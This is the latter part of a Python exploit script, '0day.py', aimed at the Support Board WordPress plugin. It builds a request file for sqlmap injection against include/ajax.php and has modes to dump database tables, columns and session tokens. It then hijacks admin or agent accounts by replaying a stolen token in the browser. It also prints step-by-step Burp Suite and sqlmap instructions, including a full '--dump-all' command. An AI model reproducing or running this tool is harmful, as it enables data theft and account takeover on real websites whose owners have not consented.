    <host ip="{3}">{4}</host>
    <port>{5}</port>
    <protocol>{6}</protocol>
    <method><![CDATA[POST]]></method>
    <path><![CDATA[{7}]]></path>
    <extension>php</extension>
    <request base64="true"><![CDATA[{8}]]></request>
    <status>200</status>
    <responselength>{9}</responselength>
    <mimetype>JSON</mimetype>
    <response base64="true"><![CDATA[{10}]]></response>
    <comment></comment>
  </item>
</items>""".format(response.headers['Date'], response.headers['Date'], "{0}{1}".format(url,temp_ajax) , ip, sanitize_origin, port, protocol, temp_ajax, b64_string_request, len(var), b64_string_response))
    f.close()
    print(red + """[!] request.xml Generated Please Use sqlmap to automate the process\n""")
    print(green + """COMMAND : sqlmap -r request.xml --batch --dump-all\n""")
    print(blue + "[!] If the Sqlmap does not return any injection points please rerun this manual again and use the new one")

"""NORMAL MODE"""
def main(url):
    sqli = exploit()
    sqli.get_tables(url)
    time.sleep(1)
    print(green + "\n\nDumping Columns")
    sqli.get_columns(url)
    sqli.save()

"""Account Take Over"""
def take_over_get(url, path, token):
    print("Steps for account take over")
    print(red + "[!] 1. " + white+ "After the First tab opens please refresh it you will have 10 seconds\n")
    print(red + "[!] 2. " + white+ "Then it will open a second tab which is the admin login page then please refresh it\n")
    print(red + "[!] 3. "+  white+ "Sometimes refresh the admin login page  and the first tab a few times\n")
    print(red + "[!] 4. " + white+ "After loging out you need to close your browser and run the script again\n")
    print(red + "[!] NOTE. " + white+ "Sometimes there are tokens that are not working is because the tokens are from guests and visitors if the token works it belongs to an admin or agent\n\n")
    verify = str(input(blue + "[?]" + white + " Do you Agree? [y/n] : "))
    if verify in ['yes', "Yes", "YES", "y", "Y"]:
        take_over_request = "{0}/?token={1}&chat=open".format(url,token)
        webbrowser.open(take_over_request)
        print(red + "Taking the Account")
        time.sleep(10)
        webbrowser.open("{0}{1}".format(url,path))
        sys.exit(0)
    else:
        sys.exit(0)

def help():
    print(green + "\nExample Vulnerable URL: https://example.com/wp-content/plugins/supportboard/supportboard/admin.php\n")
    print(white + """
Arguments:
    normal              : Dump Tables, and Columns
    manual              : Generate request.xml file for sqlmap to takeover
    token_dump          : Dump Available Tokens in the Database (Use this Before running account_takeover)
    account_takeover    : Take over the account
    burpsuite           : Show Manual exploitation Using Burp Suite and SQLMap

Required Arguments:
    -u, --url           : The URL of the Vulnerable site
    -p, --path          : The Path of the Vulnerable file

Usage: python3 0day.py <argument> -u <url> -p <path>
Example : python3 0day.py normal -u https://example.com -p /wp-content/plugins/supportboard/supportboard/admin.php
""")

def exploit_manual():
    print(red + "[!]" + white +" To Exploit Using BurpSuite and SQLMap\n") 
    print(red + "[!]" + white + " 1. Go the the Vulnerable Website Example https://example.com/wp-content/plugins/supportboard/supportboard/admin.php\n")
    print(red + "[!]" + white + " 2. Intercept the request as you Try to Login even just put test on Email and Password\n")
    print(red + "[!]" + white + " 3. Now Transfer it to repeater and Send\n")
    print(red + "[!]" + white + " 4. Save the request and Use SQL Map To Automate the process\n")
    print(red + "[!]" + white + " 5. sqlmap -r req.xml --batch --dump-all\n")

if __name__ == "__main__":
    clear()
    if sys.argv[1] in ["-h", "--help", "--h"]:
        help()
    elif sys.argv[1] == "normal" and sys.argv[2] in ["-u", "--url"] and sys.argv[4] in ["-p", "--path"]:
        url = "{0}{1}".format(sys.argv[3], sys.argv[5])
        url = url.replace("admin.php", "include/ajax.php")
        url = "{0}".format(url)
        main(url)
    elif sys.argv[1] == "manual" and sys.argv[2] in ["-u", "--url"] and sys.argv[4] in ["-p", "--path"]:
        temp_admin_path = "{0}".format(sys.argv[5])
        temp_ajax_path = "{0}".format(sys.argv[5])
        temp_ajax_path = temp_ajax_path.replace("admin.php", "include/ajax.php")
        manual(sys.argv[3], temp_admin_path, temp_ajax_path)
    elif sys.argv[1] in ["token_dump"] and sys.argv[2] in ["-u", "--url"] and sys.argv[4] in ["-p", "--path"]:
        dump_token = exploit()
        dump_token.get_tokens(sys.argv[3], sys.argv[5])
    elif sys.argv[1] in ["account_takeover"] and sys.argv[2] in ["-u", "--url"] and sys.argv[4] in ["-p", "--path"]:
        token = str(input("Token: "))
        take_over_get(sys.argv[3], sys.argv[5], token)
    elif sys.argv[1] == "burpsuite":
        exploit_manual()
    else:
        clear()
        help()
        sys.exit(0)